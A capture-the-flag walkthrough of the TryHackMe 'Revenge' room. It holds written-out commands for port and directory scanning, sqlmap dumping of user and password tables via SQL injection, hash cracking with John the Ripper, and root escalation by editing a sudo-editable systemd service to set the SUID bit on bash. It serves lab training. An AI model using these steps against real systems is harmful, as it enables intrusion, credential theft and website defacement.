Challenge Link: https://tryhackme.com/room/revenge
Before starting the challenge, we are provided with a text file which contains some hints:
To whom it may concern, I know it was you who hacked my blog. I was really impressed with your skills. You were a little sloppy and left a bit of a footprint so I was able to track you down. But, thank you for taking me up on my offer. I've done some initial enumeration of the site because I know *some* things about hacking but not enough. For that reason, I'll let you do your own enumeration and checking. What I want you to do is simple. Break into the server that's running the website and deface the front page. I don't care how you do it, just do it. But remember...DO NOT BRING DOWN THE SITE! We don't want to cause irreparable damage. When you finish the job, you'll get the rest of your payment. We agreed upon $5,000. Half up-front and half when you finish. Good luck, Billy
In this we are provided with a hint that we need to deface the front page of the website in order to complete the challenge. (This will be useful in the later part of the challenge)
I started initial enumeration by running a port scan using nmap to check for open ports and services.
┌──(madhav㉿kali)-[~/ctf/thm/revenge] └─$ nmap -sC -sV -oN nmap/initial 10.10.148.29 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-20 14:20 IST Nmap scan report for 10.10.148.29 Host is up (0.16s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 72:53:b7:7a:eb:ab:22:70:1c:f7:3c:7a:c7:76:d9:89 (RSA) | 256 43:77:00:fb:da:42:02:58:52:12:7d:cd:4e:52:4f:c3 (ECDSA) |_ 256 2b:57:13:7c:c8:4f:1d:c2:68:67:28:3f:8e:39:30:ab (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Home | Rubber Ducky Inc. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds
We have only two ports open. I decided to enumerate port 80 first. Let's open our web browser and see what's running on port 80.
We have a Rubber Ducky Inc website. Next I performed a directory brute-force attack using gobuster to look for hidden directories.
┌──(madhav㉿kali)-[~/ctf/thm/revenge] └─$ gobuster dir -u http://10.10.148.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.148.29 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/08/20 14:20:42 Starting gobuster in directory enumeration mode =============================================================== /index (Status: 200) [Size: 8541] /contact (Status: 200) [Size: 6906] /products (Status: 200) [Size: 7254] /login (Status: 200) [Size: 4980] /admin (Status: 200) [Size: 4983] /static (Status: 301) [Size: 194] [--> http://10.10.148.29/static/] =============================================================== 2021/08/20 14:22:48 Finished ===============================================================
We have an
/admin directory but that was not vulnerable. Next I started testing and understanding the basic functionality of the website and found that there is a
/products page which is vulnerable to SQL Injection.
When we visit the URL
http://10.10.148.29/products/1', we get an error message.
To exploit this, I used a tool named
sqlmap. Using sqlmap, we can exploit almost all types of SQLI in an easy way.
First I dumped all the databases using the following command:
sqlmap -u "http://10.10.148.29/products/1" --batch --dbs
We can see that there is a database named
duckyinc. Next we can dump all the tables inside the database using the following command:
sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc --tables
We have two interesting tables named
user. First I dumped the contents of the
user table and there, I found some user records with their hashed passwords and our first flag.
sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T user --dump
Next I dumped the
system_user table and found some more users and hashed passwords.
sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T system_user --dump
Next I saved all password hashes in a text file and tried to brute-force them using John The Ripper.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Hurray! We found a password. We can use these credentials to login using SSH. After logging in, we can read our second flag present in the home directory of the user.
Next I used
sudo -l command to see if the user can run any command as some other user.
*********@duckyinc:~$ sudo -l [sudo] password for *********: Matching Defaults entries for ********* on duckyinc: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User ********* may run the following commands on duckyinc: (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit /etc/systemd/system/duckyinc.service
The user can edit the
duckyinc.service, so we can modify it to get the shell as user root using the following command.
This will open the service in a nano editor.
We can modify this service to our own vulnerable version which will give us a root shell. This will give
/bin/bash a SUID bit set.
Next we need to reset the demon and restart the service using the following commands.
sudo systemctl daemon-reload sudo systemctl restart duckyinc.service
Now if we check the permission of
/bin/bash, we can see that it is a SUID. We can run the
/bin/bash -p command and this will give us the root shell.
But if we see, we do not have the root flag in
/root directory. We know from the note we got that we need to deface the front page in order to complete the challenge. So let's do it!
Now if we check the
/root directory again, we will get our root flag!
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Jesse Brais.